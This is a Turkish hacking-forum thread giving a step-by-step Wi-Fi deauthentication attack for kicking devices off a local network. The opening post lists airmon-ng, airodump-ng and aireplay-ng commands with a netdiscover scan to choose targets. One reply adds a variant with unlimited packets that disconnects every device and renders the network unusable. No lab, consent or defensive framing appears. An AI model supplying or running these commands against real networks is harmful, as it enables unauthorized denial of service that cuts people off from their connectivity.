Deauth Saldırısı Yerel Ağdaki Cihazları Ağdan Kovma

Slaptonimus

Katılımcı Üye
3 Haz 2017
447
2
Yazılı Anlatım:
1-yeni terminal açın ve "airmon-ng start wlan0" komutunu girin
2-airodump-ng wlan0mon
3-Hedef cihazı görünce ctrl+c yapın.
3-airodump-ng --channel <chanel> --bssid <bssid> wlan0mon
4-yeni bir terminal açın ve "aireplay-ng --deauth 10000 -a <bssid> -c <station> wlan0mon" komutunu girin

VİDEODA OLMAYAN ÖNEMLİ NOT: netdiscover -i wlan0 -r 192.168.1.0/24 komutu ile'de hangi cihazı ağdan düşürebileceğinizi öğrenebilirsiniz.

Videolu Anlatım:
[ame]https://www.youtube.com/watch?v=iqGc5jM6zJY&feature=youtu.be[/ame]

NOT:Komutları kopyala yapıştır yapmayın kendiniz yazın.Daha çabuk öğrenirsiniz.:RpS_cool:

Slaptonimus

Katılımcı Üye
3 Haz 2017
447
2
Teşekkürler ve program açık olduğu sürece mi işe yarıyor ?
kaç süre verirsen o kadar ağdan uzaklaştırıyor ve terminalin açık olması gerekiyor eğer 10 saniye kovmak istiyorsan ve terminale 10 saniye yazdıysan,sen terminali 3.saniyede kapatırsan 3 saniye kovmuş olur ağdan.

9 Şub 2015
87
0
Eline sağlık hocam,
Ben de bir ekleme yapayım izninle arkadaşlara faydası olur belki,

aireplay-ng --deauth 0 -a <bssid> wlan0mon

komutunu yazarsanız ağa bağlı olan ve bağlanacak olan tüm cihazları engeller. Yani ağı resmen kullanılamaz duruma getirir. Bir tane cihazı engellemektense hepsini engellemek daha mantıklı olur diye düşünüyorum. -- deauth 0 olmasının amacı sonsuz paket göndermektir.

Saygılar...

Ataerimz

Katılımcı Üye
15 Mar 2018
507
2
Guadalajara
ben bununla ilgili bir eğitim izlemiştim, ağa bağlı olmadanda hedef ağdaki cihazı ağdan atabilirsiniz deauth saldırısı yolu ile. ne kadar paket yüklerseniz o kadar iyi, 10.000 pakete daha ağa giremez o gün boyunca.

7002

Yeni üye
18 Şub 2021
28
1
wifi kartinin packet injection desteklmesi gerekmekte malesef ki bundan dolayi yapamiyorum ben

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.